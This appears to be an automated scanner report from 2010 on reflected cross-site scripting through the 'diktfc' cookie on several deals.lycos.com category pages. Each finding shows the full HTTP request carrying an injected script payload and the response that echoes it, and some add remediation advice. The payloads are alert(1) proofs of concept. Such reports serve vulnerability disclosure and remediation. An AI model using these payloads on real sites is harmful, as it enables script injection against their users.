The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec09"><script>alert(1)</script>ef66589da7f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/health-and-beauty-228 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2ec09"><script>alert(1)</script>ef66589da7f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/health-and-beauty-228&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2ec09"><script>alert(1)</script>ef66589da7f&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57630"%3balert(1)//273c00b5a44 was submitted in the diktfc cookie. This input was echoed as 57630";alert(1)//273c00b5a44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/health-and-beauty-228 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57630"%3balert(1)//273c00b5a44; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46859
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7178c"%3balert(1)//f479da64e2a was submitted in the diktfc cookie. This input was echoed as 7178c";alert(1)//f479da64e2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/home-and-garden-196 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7178c"%3balert(1)//f479da64e2a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48074
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574bb"><script>alert(1)</script>eefe4285fdf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/home-and-garden-196 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A574bb"><script>alert(1)</script>eefe4285fdf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/home-and-garden-196&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A574bb"><script>alert(1)</script>eefe4285fdf&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca710"><script>alert(1)</script>8995098f657 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/lcd-tvs-424 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aca710"><script>alert(1)</script>8995098f657; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/lcd-tvs-424&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aca710"><script>alert(1)</script>8995098f657&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c8b4"%3balert(1)//c21369f207e was submitted in the diktfc cookie. This input was echoed as 8c8b4";alert(1)//c21369f207e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/lcd-tvs-424 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8c8b4"%3balert(1)//c21369f207e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48931
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c87eb"><script>alert(1)</script>48578ff097f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/movies-music-books-178 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac87eb"><script>alert(1)</script>48578ff097f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/movies-music-books-178&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac87eb"><script>alert(1)</script>48578ff097f&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40639"%3balert(1)//4ac5d608389 was submitted in the diktfc cookie. This input was echoed as 40639";alert(1)//4ac5d608389 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/movies-music-books-178 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A40639"%3balert(1)//4ac5d608389; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46132
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7bdd"%3balert(1)//aecc2087a85 was submitted in the diktfc cookie. This input was echoed as d7bdd";alert(1)//aecc2087a85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/mp3-players-144 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad7bdd"%3balert(1)//aecc2087a85; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48339
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18ae8"><script>alert(1)</script>c9b7635a3ff was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/mp3-players-144 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A18ae8"><script>alert(1)</script>c9b7635a3ff; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/mp3-players-144&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A18ae8"><script>alert(1)</script>c9b7635a3ff&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52c09"%3balert(1)//5dd4415da8d was submitted in the diktfc cookie. This input was echoed as 52c09";alert(1)//5dd4415da8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/office-and-supplies-182 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52c09"%3balert(1)//5dd4415da8d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47344
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><script>alert(1)</script>9d30591a5a6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/office-and-supplies-182 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d7f4"><script>alert(1)</script>9d30591a5a6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/office-and-supplies-182&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d7f4"><script>alert(1)</script>9d30591a5a6&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97fa0"><script>alert(1)</script>22b63eeca5d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/pc-computers-47 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97fa0"><script>alert(1)</script>22b63eeca5d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/pc-computers-47&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97fa0"><script>alert(1)</script>22b63eeca5d&cj=1" alt="tracker" />
...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e84"%3balert(1)//725b98a132d was submitted in the diktfc cookie. This input was echoed as b3e84";alert(1)//725b98a132d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/pc-computers-47 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3e84"%3balert(1)//725b98a132d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
